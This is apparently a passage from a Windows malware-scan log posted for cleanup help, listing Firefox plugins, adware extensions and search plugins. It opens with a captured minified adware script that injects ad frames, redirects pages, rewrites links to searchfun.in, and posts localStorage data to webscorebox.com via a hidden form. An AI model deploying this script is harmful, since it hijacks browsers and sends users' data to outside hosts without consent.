function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [775,size]);}}catch(e){return !1;}},matomy_adj_21:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2432856\",\"728x90\":\"2432858\",\"160x600\":\"2432863\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [777,size]);}}catch(e){return !1;}},matomy_adj_21_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2432859\",\"300x250\":\"2432857\",\"160x600\":\"2432865\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [778,size]);}}catch(e){return !1;}},adstract_new_t3_24_3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2433000&size=+size+' (atp?atp:1), [782,size]);}}catch(e){return !1;}},yashi_apx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2422901\",\"300x250\":\"2422900\",\"728x90\":\"2422902\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [785,size]);}}catch(e){return !1;}},baba_nontb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2431150\",\"300x250\":\"2431153\",\"160x600\":\"2431154\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [786,size]);}}catch(e){return !1;}},cpx_nontb30_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/tra/32160/index.html?size=+size+&referrer=' (atp?atp:1), [442,size]);}}catch(e){return !1;}},mari_strm15:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2399328\",\"300x250\":\"2399329\",\"728x90\":\"2399330\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [750,size]);}}catch(e){return !1;}},mari_strm15_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2399331\",\"300x250\":\"2399332\",\"728x90\":\"2399333\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [751,size]);}}catch(e){return !1;}},web3_strm5:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2400822&size=+size+' (atp?atp:1), [754,size]);}}catch(e){return !1;}},matomy_strm20:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 160x600 300x250'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2432900\",\"160x600\":\"2432903\",\"300x250\":\"2432893\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [779,size]);}}catch(e){return !1;}},matomy_strm20_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2432904\",\"300x250\":\"2432899\",\"728x90\":\"2432902\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [780,size]);}}catch(e){return !1;}},adstract_strm_t3_24_3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2433019&size=+size+' (atp?atp:1), [783,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-iframe-display.php?type=+size+&login=hulkshare_RS2&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random();if(!document.getElementById(\"sad32ecs3fdsa\")&&1==Math.ceil(4*Math.random()))try{setTimeout(function(){var b=document.getElementsByTagName(\"body\")[0],a=document.createElement(\"div\");a.setAttribute(\"style\",\"width:728px;height:90px;margin:0 auto\");a.setAttribute(\"id\",\"sad32ecs3fdsa\");a.innerHTML='<iframe src=\"//ads.ventivmedia.com/www/delivery/afr.php?zoneid=31&cb='+Math.random()+'\" style=\"width:728px;height:90px\" frameborder=\"0\" scrolling=\"no\"></iframe>';b.insertBefore(a,b.firstChild)},1)}catch(e){};;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"KxccQXsm=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"KxccQXsm=\")){var d=a.match(/KxccQXsm=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8ejShVWzmPhd9HrjaMCyVUojw8rHUMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0qTk7rHY7qdaHrTsGqjwGqdkEra==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){if(document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e') && document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild){document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild.onclick=function(){return false}};if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var a=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),b=document.createElement(\"div\");b.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';a.style.position=\"relative\";a.appendChild(b)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',a.style.position=\"relative\",a.appendChild(b))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var d=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var a=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+a.top+\"px;left:\"+a.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(b){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+d.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild©}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{d=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(a){}},-1<!navigator.userAgent.indexOf(\"chrome\")?d():(c=document.createElement(\"script\"),c.innerHTML=\"(\"+d.toString()+\")()\",document.body.appendChild©)}catch(e){}if('GB'!='VN'&&-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")){var d=document.createElement(\"img\");d.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\");d.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\";var a=document.getElementById(\"r1113566095\").parentNode;a.style.position=\"relative\";a.appendChild(d)};})();if(window.self.location.hostname.indexOf('hesefiles.c')>-1) window.self.location.href='about:blank';if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\")()\";document.body.appendChild(s)}};if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")};if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"};if (-1<document.location.host.indexOf(\"bookbrowsee.ne\")) {new function(){for(var c=[\"adv.php?\",\"/adv.php?\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.pathname+a.search,b=0;b<c.length;b++)c==e.substr(0,c.length)&&\"nofollow\"==a.rel&&\"_blank\"==a.target&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(a){a.returnValue=!1;a.preventDefault&&a.preventDefault()},!1))}};if(-1<document.location.host.indexOf(\"irrorcreator.co\")){for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax.com/e/?f=rjsHvTs9vTw5qi5FqHbXrjr4qjg6rHgHqa%3D%3D&eid=310&hid=6563864032225124500&pid=1539&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))};if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&5>parseInt(\"64.96\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG4ZhyqZC7YKg70Jv6qTCMVEDc0EgeqRg6bJvNbOCd0GojsGrjUErchXCMhMofb5vNbIDeDPBMY%3D\");var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};})();(function(){void(0)})()");
FF - prefs.js..keyword.URL: "http://www.bigseekpr...2441E553C0}?q="
 
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_11_8_800_94.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.51.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.51.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect: C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_8_800_94.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1210150.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@Google.com/GoogleEarthPlugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.51.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.51.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6: C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3508.0205: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKLM\Software\MozillaPlugins\@soe.sony.com/installer,version=1.0.3: C:\Users\PhanCo.FAMILIE-LE-NB\AppData\LocalLow\Sony Online Entertainment\npsoe.dll ()
FF - HKLM\Software\MozillaPlugins\@t.garena.com/garenatalk: C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Temp\Rar$EXa0.497\LienMinhHuyenThoai\GameData\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Program Files (x86)\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF - HKLM\Software\MozillaPlugins\@zing.vn/ZingPlay-WebControl-1,version=1.0.1: C:\Program Files\VinaGame\ZingPlay\npWebActivater.dll (VNG Corp.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect: C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}: C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension\ [2012.02.22 23:26:23 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\Alwil Software\Avast5\WebRep\FF [2009.01.05 05:40:01 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Extensions\MozillaHotfix [2013.05.07 23:11:15 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 8.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2013.11.11 12:39:20 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 8.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2013.11.11 12:39:20 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\[email protected]: C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Extensions\MozillaHotfix [2013.05.07 23:11:15 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\PasswordBox\Firefox [2013.09.10 16:57:18 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\[email protected]: C:\Users\Papa\AppData\Roaming\IDM\idmmzcc5 [2013.09.15 20:07:19 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\SeaMonkey\Extensions\\[email protected]: C:\Users\Papa\AppData\Roaming\IDM\idmmzcc5 [2013.09.15 20:07:19 | 000,000,000 | ---D | M]
 
[2011.10.30 21:11:54 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\Extensions
[2011.10.30 21:11:54 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\Extensions\[email protected]
[2013.05.07 23:11:15 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Extensions
[2013.05.07 23:11:15 | 000,000,000 | ---D | M] (Mozilla hotfix) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Extensions\MozillaHotfix
[2014.06.25 18:36:59 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions
[2014.03.24 22:13:50 | 000,000,000 | ---D | M] (Yahoo! Toolbar) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1}
[2013.04.26 02:19:15 | 000,000,000 | ---D | M] (Hao123 toolbar) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\{97A78363-B868-4B48-AC91-A783A31215AF}
[2012.02.18 00:05:05 | 000,000,000 | ---D | M] ("Free YouTube Download (Free Studio) Menu") -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\{ACAA314B-EEBA-48e4-AD47-84E31C44796C}
[2014.01.12 22:05:14 | 000,000,000 | ---D | M] ("MySearchDial NewTab") -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\{ad9a41d2-9a49-4fa6-a79e-71a0785364c8}
[2014.03.24 22:12:21 | 000,000,000 | ---D | M] ("VisualBee") -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\67314b39-24e6-4f05-99f3-3f88c7cddd17@6c5fa560-13a3-4d42-8e90-53d9930111f9.com
[2014.03.24 22:07:07 | 000,000,000 | ---D | M] (savenshAriE) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]
[2013.04.26 21:49:48 | 000,000,000 | ---D | M] (Delta Toolbar) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]
[2014.01.12 22:05:11 | 000,000,000 | ---D | M] (mysearchdial.com) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]
[2014.03.24 22:07:07 | 000,000,000 | ---D | M] (SearchNewTab) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]
[2014.03.24 22:07:11 | 000,000,000 | ---D | M] (Soearachh-NewTiaabi) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]
[2013.04.26 21:49:39 | 000,000,000 | ---D | M] (Yontoo) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]
[2014.03.24 22:07:15 | 000,000,000 | ---D | M] (contaiynuettosaovve) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]
[2014.03.24 22:07:15 | 000,000,000 | ---D | M] (greaTsavear) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\[email protected]
[2014.03.24 22:12:18 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\67314b39-24e6-4f05-99f3-3f88c7cddd17@6c5fa560-13a3-4d42-8e90-53d9930111f9.com\extensionData
[2014.03.24 22:12:18 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\67314b39-24e6-4f05-99f3-3f88c7cddd17@6c5fa560-13a3-4d42-8e90-53d9930111f9.com\extensionData\plugins
[2014.03.24 22:12:19 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\Firefox\Profiles\12lc5kq6.default\extensions\67314b39-24e6-4f05-99f3-3f88c7cddd17@6c5fa560-13a3-4d42-8e90-53d9930111f9.com\extensionData\userCode
[2014.03.24 22:13:43 | 000,050,738 | ---- | M] () (No name found) -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\extensions\[email protected]
[2013.06.02 18:31:45 | 000,006,503 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\babylon.xml
[2013.06.02 18:31:45 | 000,006,503 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\BrowserProtect.xml
[2013.06.02 18:32:01 | 000,001,294 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\delta.xml
[2014.03.24 22:07:26 | 000,002,399 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\Mysearchdial.xml
[2013.05.08 21:37:14 | 000,002,047 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\passwordbox.xml
[2009.01.05 05:31:56 | 000,001,977 | ---- | M] () -- C:\Users\Papa\AppData\Roaming\mozilla\firefox\profiles\12lc5kq6.default\searchplugins\search-here.xml
